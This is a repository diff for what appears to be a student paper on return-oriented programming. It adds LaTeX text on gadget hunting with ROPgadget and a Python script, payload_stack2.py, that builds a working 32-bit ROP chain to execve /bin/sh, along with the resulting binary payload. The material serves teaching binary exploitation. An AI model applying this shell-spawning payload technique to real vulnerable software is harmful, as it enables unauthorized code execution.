changes

paper.bbl

@@ -0,0 +1,7 @@
+\begin{thebibliography}{ES}
+
+\bibitem[ES]{el-sherei}
+Saif El-Sherei.
+\newblock Return oriented programming (rop ftw) - exploit-db.com.
+
+\end{thebibliography}

paper.blg

@@ -0,0 +1,46 @@
+This is BibTeX, Version 0.99d (TeX Live 2022/Arch Linux)
+Capacity: max_strings=200000, hash_size=200000, hash_prime=170003
+The top-level auxiliary file: paper.aux
+The style file: alpha.bst
+Database file #1: refs.bib
+You've used 1 entry,
+            2543 wiz_defined-function locations,
+            562 strings with 4548 characters,
+and the built_in function-call counts, 276 in all, are:
+= -- 22
+> -- 8
+< -- 1
++ -- 2
+- -- 2
+* -- 12
+:= -- 50
+add.period$ -- 2
+call.type$ -- 1
+change.case$ -- 5
+chr.to.int$ -- 1
+cite$ -- 1
+duplicate$ -- 11
+empty$ -- 26
+format.name$ -- 3
+if$ -- 55
+int.to.chr$ -- 1
+int.to.str$ -- 0
+missing$ -- 0
+newline$ -- 7
+num.names$ -- 3
+pop$ -- 10
+preamble$ -- 1
+purify$ -- 6
+quote$ -- 0
+skip$ -- 14
+stack$ -- 0
+substring$ -- 7
+swap$ -- 1
+text.length$ -- 1
+text.prefix$ -- 0
+top$ -- 0
+type$ -- 8
+warning$ -- 0
+while$ -- 2
+width$ -- 2
+write$ -- 11

paper.tex

@@ -68,6 +68,7 @@ \section{Gadgets}
 Gadgets are code segments that sit before a \Verb+ret+ instruction, these assembly instructions can be chained arbitrarily
 
 \paragraph{How to find Gadgets}
+\label{par:ropgadget}
 A gadget can be found by searching for \Verb+0xC3+ Bytes in the program. The instructions before then represent the code we can use, for that we need the address of the gadget. It is possible this manually using tools like \Verb+objdump+, \Verb+hexdump+ or use one of the many tools available, to name a few there is \Verb+ropper+, \Verb+ROPgadget+ and \Verb+pwntools+. For this paper i will be using \Verb+ROPgadget+ since i found it easy to use and fast. \Verb+ROPgadget+ can be found in most package managers or can be downloaded directly from \url{https://github.com/JonathanSalwan/ROPgadget}. The gadgets can be extracted from the file using the following command~\cref{dumpallgadgets}. We can then use regular expressions to search for the gadgets that we need.
 \bltCommand{ropcommand.sh}{Exporting gadgets with ROPgadget}{dumpallgadgets}
 This command produces an output with results similar to this.
@@ -96,6 +97,7 @@ \subsection{Filtering the gadgets}
 
 \section{Theory}
 \subsection{Stack}
+The following graphic is an illustration of how the stack changes when injecting the payload. The buffer first has to be filled. In binary exploitation the letter \Verb+A+ is used for that most of the time, it has an easy to identify hexadecimal value of \bltInlineVerb{0x41}. It is important to note that without any special compiler options the stack will be aligned in \bltInlineVerb{dword}'s, because of that the buffer has to be filled with 16 Bytes instead of 8 Bytes, this can be turned off with the option \bltInlineVerb{-mpreferred-stack-boundary=2}. Though, then the payload only worked when filling the buffer with 24 Bytes.
 \begin{figure}[h]
   \centering
   \includegraphics[width=0.65\textwidth]{stackropoffsec.png}
@@ -117,9 +119,9 @@ \subsection{Phases of developing the attack}
 \paragraph{Phases}
 The attack consists of several phases
 \begin{enumerate}
-  \item Specify concrete goal with required program state and instructions
-  \item Generate desired list of instructions and arguments (abstract payload)
-  \item Extract gadgets using tools
+  \item Specify goal with required program state and instructions
+  \item Generate desired list of instructions and arguments (abstract payload/rop chain)
+  \item Extract gadgets using tools, e.g. ROPgadget~\cref{par:ropgadget}
   \item Search gadgets for instructions
   \item Generate payload using the gadgets according to the the abstract payload while making sure gadgets dont interfere with our desired program state. This step can be done using Python which we will show in a later section~\cref{howtopack}
   \item Insert payload into target
@@ -148,7 +150,7 @@ \section{Discussion}
 \bltInlineVerb{https://guyinatuxedo.github.io/5.1-mitigation_aslr_pie/index.html}
 %%%% 8. BILBIOGRAPHY %%%%
 \bibliographystyle{alpha}
-\bibliography{abbrev3,crypto,biblio}
+\bibliography{refs}
 %%%% NOTES
 % - Download abbrev3.bib and crypto.bib from https://cryptobib.di.ens.fr/
 % - Use bilbio.bib for additional references not in the cryptobib database.

payload_stack2.py

@@ -0,0 +1,54 @@
+from struct import pack
+import os
+data = 0x080e5020
+xor_eax_eax = 0x08050a28 # xor eax, eax ; ret
+pop_eax = 0x080ac78a # pop eax ; ret
+pop_ebx = 0x08049022 # pop ebx ; ret
+pop_ecx = 0x08054f7b # pop ecx ; add al, 0xf6 ; ret
+pop_edx = 0x0808b2a5 # pop edx ; xor eax, eax ; pop edi ; ret
+inc_eax = 0x0809d0ce # inc eax ; ret
+int_80 = 0x080499d2 # int 0x80
+mov_edx_eax = 0x08080762 # mov dword ptr [edx], eax ; ret
+xor_edx_edx = 0x0807b199 # xor edx, edx ; mov eax, edx ; ret
+filler = 0x11111111
+# Padding goes here
+p = bytes('AAAA' * 6 + 'BBBB' * 1, 'ascii')
+
+p += pack('<I', pop_edx) # write address of .data into edx
+p += pack('<I', data)
+p += pack('<I', filler)
+p += pack('<I', pop_eax) # write /bin into eax
+p += bytes('/bin', 'ascii')
+p += pack('<I', mov_edx_eax) # mov to .data
+p += pack('<I', pop_edx) # address of .data + 4 into edx
+p += pack('<I', data + 4)
+p += pack('<I', filler)
+p += pack('<I', pop_eax) # //sh into eax
+p += bytes('//sh', 'ascii')
+p += pack('<I', mov_edx_eax) # mov to .data
+p += pack('<I', pop_edx) # address of .data + 8 into edx
+p += pack('<I', data + 8)
+p += pack('<I', filler)
+p += pack('<I', xor_eax_eax) # clear eax
+p += pack('<I', mov_edx_eax) # write null after /bin/sh
+p += pack('<I', pop_ebx)
+p += pack('<I', data)
+p += pack('<I', pop_ecx) # write arguments into ecx
+p += pack('<I', data + 8)
+p += pack('<I', xor_edx_edx) # clear edx
+p += pack('<I', xor_eax_eax) # set eax to 11 (execve)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', inc_eax)
+p += pack('<I', int_80) # call interrupt
+print(str(p)[2:-1])
+with open('payload_stack_two', 'wb') as file:
+    file.write(p)

payload_stack_two

@@ -0,0 +1,5 @@
+AAAAAAAAAAAAAAAAAAAAAAAABBBB�� P��
+/binb��$P��
+//shb��(P(
+b"� P{O(P��(
+��	��	��	��	��	��	��	��	��	��	��	ҙ